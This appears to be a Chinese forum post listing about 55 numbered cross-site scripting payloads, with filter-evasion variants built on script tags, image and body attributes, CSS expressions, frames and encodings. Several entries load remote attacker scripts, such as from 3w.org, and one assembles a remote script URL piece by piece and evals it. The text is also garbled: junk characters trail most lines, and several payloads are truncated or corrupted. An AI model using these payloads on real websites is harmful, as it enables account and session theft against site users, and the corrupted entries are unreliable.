(1)普通的XSS JavaScript注入# g; J! p* W. I. t5 u* v% ?
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' `- x9 P* E4 S' W3 D' `(99)另类弹框! F& o& Q0 v5 `, o2 h. W- F
<q/oncut=alert()>1
, s8 N; K9 ]: Y Y4 ?<s/onclick=alert()>b
$ p9 Q h: f# t1 Q) g, }0 p! d <XSS=" onclick="alert(1)//">clickme</SSX=">, b! o- [/ ~7 _$ L
<zzz onclick=alert`1`>clickme</zzz> % @5 \# y" ]# r9 i# z
<a onclick=alert`1`>clickme</a>
8 J5 a, h. \$ e U+ D* _, k. L<a=">clickme</a="># j& m( v ]% _+ J) C$ d+ U' u/ h
<a=">clickme</a>0 L4 ?0 J- f8 k& P
<z=">clickme</z=">; g2 Q: [" a, Z6 h; y
<z onclick=alert`1`>clickme</z>2 [9 ^9 j# X( [; T4 L6 Y. c
. e8 \% I# r% \(2)IMG标签XSS使用JavaScript命令
" |% C/ r, D1 ?- w6 L$ [6 {<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, d( L) e( Q) \* I2 p
5 w/ H2 `9 v) O3 C(3)IMG标签无分号无引号& c/ i+ F9 v+ }5 D) O5 u
<IMG SRC=javascript:alert(‘XSS’)>5 @1 s" w7 `4 {
2 O6 S4 s, j3 u# W8 P1 ^8 a; Q
(4)IMG标签大小写不敏感
7 h0 ]- ?/ W1 K# P: p0 m+ O; l<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
9 h# f6 i4 b) A. f6 k. X7 t* a/ i0 p) @; F" F% g2 G
(5)HTML编码(必须有分号), l) w5 V9 l% e2 c: D
<IMG SRC=javascript:alert(“XSS”)>
0 W' B: [; H# s6 S
1 b, I/ k2 F( d) }' H: a(6)修正缺陷IMG标签
% A5 X4 D! O% L' }1 G5 w<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>( ?6 w5 d8 @: ]: d4 h5 f& J
) x! |/ q0 ~: f* L$ v7 R3 r(7)formCharCode标签(计算器)1 v6 u4 z. H; b2 [" z0 O7 e
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>0 d( E2 |: {4 v; R
" x4 E" A4 `' ]8 R7 A(8)UTF-8的Unicode编码(计算器)! a# h# J9 M9 |* F
<IMG SRC=jav..省略..S')>
; H: n6 H# s- W) H) L' n; O5 B
6 S# K4 @# J+ S1 j$ s(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
; I% _9 L( g" R( |* A<IMG SRC=jav..省略..S')>
# V5 j) N- v; l0 s) R b
* ?$ Z7 A# W$ d) ~(10)十六进制编码也是没有分号(计算器): {" r( {% U- d( H# t c
<IMG SRC=\'#\'" /span>% F% K. d! e1 A
& v; p5 @+ p' c' y2 H/ k(11)嵌入式标签,将Javascript分开
- P% G4 |7 P6 l" ^3 V<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
2 k; U) F3 t) Y$ L/ u
% l* Q: D* }) q! }(12)嵌入式编码标签,将Javascript分开
& w$ n& j& _5 U+ {3 W; f* l# p8 a<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>$ J9 p- B; F* O1 @
" B9 b) t% V2 |; W. Z( d
(13)嵌入式换行符+ c- o! I( B! h M
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>8 Q/ {3 l2 t4 W
/ e% K+ h* @+ v r' T3 `# u(14)嵌入式回车
8 c" D- G" e% M<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
. o& F; f/ E7 g# i$ B+ h' V: O1 z( S
(15)嵌入式多行注入JavaScript,这是XSS极端的例子" U$ D' _; _) U( D
<IMG SRC=\'#\'" /span>
. Z# R4 b( L, i* a( _
! `, [" q& ]6 E$ @# U+ ~(16)解决限制字符(要求同页面)( y- o( z1 C) s$ F
<script>z=’document.’</script>1 g+ k8 U: r* F8 D
<script>z=z+’write(“‘</script> r- r: A7 Z- ?3 u( P
<script>z=z+’<script’</script>* g# T# a d: D9 W# K5 @
<script>z=z+’ src=ht’</script>- O1 z. e* [& D5 T
<script>z=z+’tp://ww’</script># D! b1 a7 z* P# X: _
<script>z=z+’w.shell’</script>; G9 \% }/ P/ a( N6 s9 Q' g* C- s! C
<script>z=z+’.net/1.’</script>" q) d8 U& d g. ]: ?
<script>z=z+’js></sc’</script>
/ L l! U6 S9 p+ \) M<script>z=z+’ript>”)’</script>
4 _. i5 @* _% E* u/ D4 Z<script>eval_r(z)</script>
9 x) t8 ^7 n, ~
* C4 b. J2 K3 l1 g. X(17)空字符, }1 w& z3 |; C, M
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out: h! M% Q+ E+ O" D- _9 W- J' [
! u3 d5 K% H& O+ R5 q
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: M# ^. _, G7 Q4 u, J; z3 q2 u1 G
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
0 `4 ]4 N' N, }' e' S% x5 c' X, \$ U6 i
(19)Spaces和meta前的IMG标签* f" A2 t6 R- ?7 u! d/ f" T8 ?
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
8 z& p0 t: l. u
- x; x7 e/ h7 R7 r: w(20)Non-alpha-non-digit XSS
7 X+ b$ O" D( B9 {<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>8 o" ~1 `% G) H4 t0 x+ @4 u# g- X
# p1 Y, B8 ?9 F: X" d
(21)Non-alpha-non-digit XSS to 2+ B. t- K5 Y; |. s" O. C
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>( O- ~% X+ a& R+ u! ~* ?' I0 d
9 S/ p9 k2 a8 C) x5 e4 R(22)Non-alpha-non-digit XSS to 3& J$ R; [7 F& v6 C% W j
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
' O* j; U1 u, @+ j/ v8 L2 \" y* i0 c$ H0 d
(23)双开括号) ]9 J* `5 D1 J
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
% [ ^. }9 ]/ m+ i" }1 h3 M7 t( v- G- i* p5 Z: [7 i
(24)无结束脚本标记(仅火狐等浏览器). D* J* G) o: \& h
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>1 Q Q5 a+ v3 @* ^; k' [
1 c b$ w/ Q# o) }' M(25)无结束脚本标记2' t9 }, K9 ~/ i# a9 Z$ N$ q3 D
<SCRIPT SRC=//3w.org/XSS/xss.js>
- G( j+ }4 L$ w/ ?: B3 X% }- L* c( v0 ~4 Q4 S, D
(26)半开的HTML/JavaScript XSS; V" X; y; k4 S- T6 N$ h! j, h
<IMG SRC=\'#\'" /span>8 R$ Q3 \0 ^% c+ Y* R- h
6 n" i- W8 m1 O(27)双开角括号( p6 f5 m: ^# e
<iframe src=http://3w.org/XSS.html <
6 U9 V! f/ _5 |# s
/ J: I4 V! K" O( g9 O(28)无单引号 双引号 分号- A+ t" `/ }5 Q; N9 v" @2 [2 t6 {
<SCRIPT>a=/XSS/
- u' k+ K* K0 l* Falert(a.source)</SCRIPT>
" z4 f, X+ N P1 X% P" U; c a; [+ g5 }
(29)换码过滤的JavaScript- c9 z7 ~$ I/ @8 D. d: m+ W
\”;alert(‘XSS’);//3 _4 H& Y t. j
/ x. T j" P0 t! N% a8 g(30)结束Title标签
; d! k; O4 J: p4 v5 k, B</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>" m) y/ t: R! T" D2 b
' V( B; e( [& ], ?6 c(31)Input Image5 K' i; V1 _6 N) B( `$ X" F0 W
<INPUT SRC=\'#\'" /span> N3 o/ I+ S! p; K- y
$ ]% q% I n, a(32)BODY Image
. f' H i7 F t5 [5 P! s<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 O' A& J( T( e5 u w
( j( D. r$ d; w(33)BODY标签
% w$ q) I6 G Z$ R# r: U9 ^4 v<BODY(‘XSS’)>
1 P9 f6 b \! P" }) A# ?! @3 u; t+ X8 |* f& ^
(34)IMG Dynsrc
1 D4 Q# B7 b) r" d2 w, P/ [<IMG DYNSRC=\'#\'" /span>
- B1 E1 Z! F/ v: L8 x
5 a1 N$ i; x5 d* ~) X+ \(35)IMG Lowsrc
3 x# N3 S- x \2 m<IMG LOWSRC=\'#\'" /span>5 l) o9 T* p% Z5 S* Z& Z
, T. O+ p, O+ c; U$ X3 x! P$ r3 @% K% g
(36)BGSOUND
! s! b/ Q2 r9 z! z5 L( d<BGSOUND SRC=\'#\'" /span>
3 p2 t& {8 Q" E$ z( ^) A" d. E! v8 \. C6 g' t2 G& X4 D+ z7 \' k
(37)STYLE sheet
& _( G: B. n2 I" O: Z<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
1 L, X' N4 Q# _1 {0 ~9 e7 o$ x/ W/ z+ A3 Z! F
(38)远程样式表7 d( Y { x0 \* Z9 i" K
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
1 s1 m9 p5 Z5 U& Z( h1 s) H1 @, C
3 {+ o8 [* a; K$ l(39)List-style-image(列表式)
: ]8 Q g% e5 H<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
( u1 q- W5 [4 t7 P/ Y; b y( m/ c; N, b, w- ]
(40)IMG VBscript, R* E& J7 j7 m, Y, t- w8 w
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
7 H. p4 x7 _$ @8 P+ N- \+ X# Z! I. }+ x/ J2 s* Z
(41)META链接url, ~$ q8 [) J* W! O0 S0 U- j
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
4 j$ \/ b* n( t, ]+ Y4 U. Y3 a8 C; f" y; U& f9 Y9 d* a
(42)Iframe4 q& h# h: \! ~0 |7 M
<IFRAME SRC=\'#\'" /IFRAME>) Y0 ?" F f3 P, c
_* T; `- n& }- c4 o
(43)Frame
: r9 e$ A, n N1 e. k$ L# S<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
9 ?7 Z( @* y) A# Q# g$ m( q; o
! E9 K$ s# q" N" \" l(44)Table5 G# k# D! }$ B/ S/ W( C2 P9 J
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>. M e8 H9 |" a! D0 j
1 Z7 n, g+ d5 N! E3 ?; Q% C+ U(45)TD
. j# M$ H) j0 v<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
' m7 w0 U! M5 v* L) S, s
5 y& e+ ]- ~. R( o(46)DIV background-image
( U% x* j5 m. C; |# P<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>: g+ U6 |+ _5 r; H1 U, g" _
$ v, A5 x" i L0 x! V& b( h(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
G- W t0 e9 r: a/ y* A<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>4 t, u% `& f. {! t! w+ t' `. X
5 \( C+ q; v" c. A(48)DIV expression5 h9 L" }2 @& W {( ?
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>/ E1 W' X8 e. c0 t! m, `
9 b3 {, c9 ?5 C9 J+ G(49)STYLE属性分拆表达' {$ z0 F3 [" a# j6 R9 M; O* a
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>6 K n& s+ X0 T+ t0 v
o+ I" q) R. N
(50)匿名STYLE(组成:开角号和一个字母开头)/ D+ _6 Z( u2 q
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
{6 ?7 U# q" l m, r- k8 O O: k. s' I- e2 _8 }/ ~; R
(51)STYLE background-image
8 ]% a. Q4 A- i. E' q2 L @<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
1 M1 Y' C: v G# i' p
) S% {0 |% F% q8 C% y(52)IMG STYLE方式9 e Z1 v* O) {* F S& t
exppression(alert(“XSS”))’>
4 R k' u( n% R0 k
% K* r2 k2 {6 e' g4 @ t(53)STYLE background, G3 R" y5 I% z! K% w8 O# B+ B2 @/ p
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- b8 c4 w0 @8 s
. I6 F- c J+ Q
(54)BASE
0 y: L1 c$ [0 \' K8 m4 z3 Z<BASE HREF=”javascript:alert(‘XSS’);//”>! p- n& {4 g2 t$ P) [4 d: V: f
$ C3 O5 O0 U4 I# O$ F3 \. L(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
5 k# {, G0 v% L4 j2 H9 b: l<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>7 E2 @8 p; {& k( ^8 o6 [' b6 r
|
发表于 2016-4-28 10:06:15
收藏
支持
反对